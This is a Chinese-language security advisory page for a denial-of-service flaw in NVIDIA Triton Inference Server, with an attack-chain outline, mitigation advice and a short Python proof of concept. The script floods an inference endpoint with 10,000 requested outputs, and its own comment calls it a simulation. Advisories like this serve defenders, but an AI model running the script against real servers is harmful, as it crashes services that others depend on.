CVE-2026-24146 CVSS 7.5 高危

CVE-2026-24146 NVIDIA Triton 推理服务器拒绝服务漏洞

披露日期: 2026-04-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-24146

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

NVIDIA Triton Inference Server

漏洞概述

NVIDIA Triton Inference Server 存在安全漏洞，由于输入验证不足及处理大量输出请求时存在缺陷，可能导致服务器崩溃。未经认证的攻击者可远程利用此漏洞，通过发送特制数据包耗尽服务器资源，导致推理服务不可用。该漏洞不仅影响业务连续性，还可能导致关键AI服务中断，属于高危风险。

技术细节

该漏洞的根本原因在于 NVIDIA Triton Inference Server 在处理推理请求时，对输入参数的验证逻辑不够严谨，特别是缺乏对输出数据量的有效限制。攻击者可以向受影响的服务器发送精心构造的恶意请求，该请求包含异常庞大的输出参数列表。当服务器尝试解析并准备这些输出时，由于未能正确分配或管理内存资源，会触发内部错误或导致资源耗尽。由于该漏洞无需用户交互且攻击复杂度低，攻击者可轻易通过自动化脚本远程发起攻击，造成服务进程崩溃，从而实现拒绝服务攻击。

攻击链分析

STEP 1

侦察

攻击者扫描网络端口，寻找暴露的 NVIDIA Triton Inference Server (通常为 8000/8001 端口)。

STEP 2

漏洞利用

攻击者无需认证，直接向服务端点发送构造的包含大量输出参数的恶意 HTTP POST 请求。

STEP 3

达成目标

服务器因无法处理异常的大规模输出请求，导致资源耗尽或进程崩溃，推理服务中断。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# Target URL (replace with actual target)
target_url = "http://target-triton-server:8000/v2/models/example_model/infer"

# Malicious payload requesting excessive outputs
# Simulating a request that triggers the "large number of outputs" vulnerability
payload = {
    "id": "test_dos",
    "inputs": [
        {
            "name": "input0",
            "shape": [1, 16],
            "datatype": "FP32",
            "data": [0.0] * 16
        }
    ],
    "outputs": [
        # Generating a large number of output requests to trigger the crash
        {"name": f"output_{i}"} for i in range(10000)
    ]
}

headers = {"Content-Type": "application/json"}

try:
    print(f"Sending malicious request to {target_url}...")
    response = requests.post(target_url, data=json.dumps(payload), headers=headers, timeout=10)
    print(f"Response Status Code: {response.status_code}")
    # If the server crashes, the response might be a timeout or connection error
except requests.exceptions.RequestException as e:
    print(f"Potential DoS triggered: {e}")

影响范围

NVIDIA Triton Inference Server（具体受影响版本请参考NVIDIA官方安全公告）

防御指南

临时缓解措施

建议立即检查服务器日志是否存在异常大量输出请求。在未升级补丁前，应在网络边界设置严格的访问控制策略，禁止非受信来源访问 Triton 服务端口。同时，可配置反向代理限制单个请求的大小和并发连接数，以减缓攻击影响。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表